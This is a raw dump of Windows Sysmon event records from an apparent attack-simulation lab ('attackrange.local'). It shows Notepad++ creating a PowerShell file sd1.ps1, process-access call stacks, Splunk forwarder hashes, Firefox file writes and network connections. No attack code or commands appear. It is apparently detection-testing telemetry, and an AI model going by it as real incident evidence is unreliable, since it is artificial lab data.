Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001047071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.117{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnk2021-07-12 07:47:36.117 10341000x80000000000000001047070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.101{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:36.101{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.101{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\windows.storage.dll+3c720e|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.storage.dll+3ca38e|C:\Windows\System32\windows.storage.dll+3c603f|C:\Windows\System32\windows.storage.dll+3c7180|C:\Windows\System32\windows.storage.dll+3c921e|C:\Windows\System32\windows.storage.dll+7a223|C:\Windows\System32\windows.storage.dll+7b829|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+3c78d8|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de|C:\Windows\System32\COMDLG32.dll+21b5d|C:\Windows\System32\USER32.dll+23a42|C:\Windows\System32\USER32.dll+1f839|C:\Windows\System32\USER32.dll+1f7b6 10341000x80000000000000001047062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c78bc|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de 10341000x80000000000000001047061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+3c78bc|C:\Windows\System32\windows.storage.dll+3cbeef|C:\Windows\System32\COMDLG32.dll+d92b|C:\Windows\System32\COMDLG32.dll+d6ae|C:\Windows\System32\COMDLG32.dll+12618|C:\Windows\System32\COMDLG32.dll+1a2f9|C:\Windows\System32\SHELL32.dll+14064c|C:\Windows\System32\SHELL32.dll+105193|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+104e34|C:\Windows\System32\SHELL32.dll+14a655|C:\Windows\System32\SHELL32.dll+13d653|C:\Windows\System32\SHLWAPI.dll+a3de|C:\Windows\System32\COMDLG32.dll+21b5d 11241100x80000000000000001047060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.085{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd1.ps12021-07-12 07:47:36.085 23542300x8000000000000000806743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:37.893{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1FF80F4A8ED25232060CDE63C866C60,SHA256=0EEE00F94E4D5EDD0C938DA9F4597B2F550DC69DD00659A953D7E4D0181DBAB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:37.215{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C151CC5D9A77E44321CDEEB198DDC6CE,SHA256=E0BECE4568CFB94F7A3949CF7EB791209A727C2AB4088F6A8AF9D53834EE190D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:38.909{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A50B3F8421C7E8AE07A0B57A087774B,SHA256=B9307C494A2F5C399D59AB30903EB3CE7AC8FB521E94216657D62800C165CEC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:38.485{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=0207B6AF6851FAACBB9E46896BEE388B,SHA256=1494F3CC3526CFE484CF3AF0A4B3A02350BBE944E6D88A94AC33B8B843E5FDEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:38.217{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C24A2B36B5129C08408142B6B2907D0A,SHA256=A6F8CF01180A853E344C6ADE6CC721E03EAB1759FAA7A345E9D9F11423EF9964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:39.924{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6122BCA6D0F75D70352C81FBA170470D,SHA256=DC8785AC3E1455DC95820F969EBA62EF7F1EFCC2449D4FB3FF7528AF478A431E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:39.232{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D5EBB584FAE538C2DD52763DDC1B923,SHA256=973B88B562736FC42A2BFE936D67D60F11501FCD55E2C3D47C8A6B26887E1B91,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:38.275{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57204-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:40.971{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98D7DD809CE9A7FB583728F0B7C71017,SHA256=0930F61D422D1DF110FC143A9477587A87A0EE55801FA61CEDE81977514FB9CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50956-false10.0.1.12-8000- 23542300x80000000000000001047147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:40.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9600357BB104448502D4099B8CCFB4A,SHA256=891FBCD829D698227A607B873FB5B34441010E045C5ECC69AAEAED4E50F2E223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.915{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DC50045B664F1BA7D5BEBB888F4F28B8,SHA256=7A0CBFE3C1637A96916BAEB526C4419F72D00ACE8DE0F328144BA210C777F00E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.915{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=157F693F4E51D94DA8A7E379D8E7BDBC,SHA256=4B96C945F6C4F149D9650D7A4EE23A4BAADC5EC6D5219F33F06B9A2D196BC41A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7CD9AA6A35158B09D8082990B77C36A7,SHA256=CB559C2A5D68D782376F2315CA032B4250F8E3021AF4F460B4FC3C9A25105837,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F74099A4A3866FD6B1CB4D0FEACAB390,SHA256=123E28A64690A3404C0B1E83E90429F9DD255FB512FCD5ADA88D9DA3C551E5CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7287B5E5E932885845D92597C1432299,SHA256=E52B32B3B0BC6F6F37583F72AC57E35EA4AF180C6C5CB115254BEDE654B30F4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6DA303825C1E51F23AB07EE8C1FC95E9,SHA256=A54F15A7386CBCDCFD4892D18F68F8F7116E127661C9E80F1E6E1128D8549E7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2A444EDFE1D68B556C3763CB6F3DDC34,SHA256=92EFBF138B05CC21E53E10A0C08E9B965CAF497FDDBA2C24D6CA3710D13F40BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=288D24AC70965A8B940CF60A278B02DC,SHA256=C54B55EF45A529A35710273102F7FCCF39F70225A299715D7EB67B9B75BC6E17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E82B17A7673FB1AFA616725AA247EE64,SHA256=81071026562F60CF544D1525A90DA3D2F0CE24297642147436AE65D2C43945E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7554B237D3E7E8561CAABA8D8100DC3D,SHA256=A52CB31B2A5443511172203244D9BE84173552686CDF8AFCA84EFB3C0E7B78BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.899{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E3DD385343381166D169B4B6CDFEE748,SHA256=69269029C52A856C46B9AA981E0B3FD26EB6A7A60BC49509C1960124F6E8A40D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:41.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7666A9025030A2FB4192A445167E7E55,SHA256=10B5A31CABE011A5CB66C20D840B6F9CCED76B5CFF630249228E4DC52982B6BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:42.283{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=905AAF0692F54E1ECF8F3A12A22037CE,SHA256=816B710E019CE383369E80AE633CA0BECD788522711DFF1382898CE1D2588128,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000806749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:47:42.473{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f2-0x320f2ee7) 23542300x8000000000000000806748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:42.004{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=418CE3FF6A56C26BAC61B5AD5889C108,SHA256=BBB42141F4CABDFAB2B5A201B8DFCDDCD6ADEE5755C293C0150EFB36A8F45589,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:43.284{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2E310142C159F497BE9175AC741863C,SHA256=2CBF4386A121155640B3677FDDB5057AD82F74610E5892099C653028D78CA14A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:42.605{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse20.101.57.9-123ntp 354300x8000000000000000806751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:42.605{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL 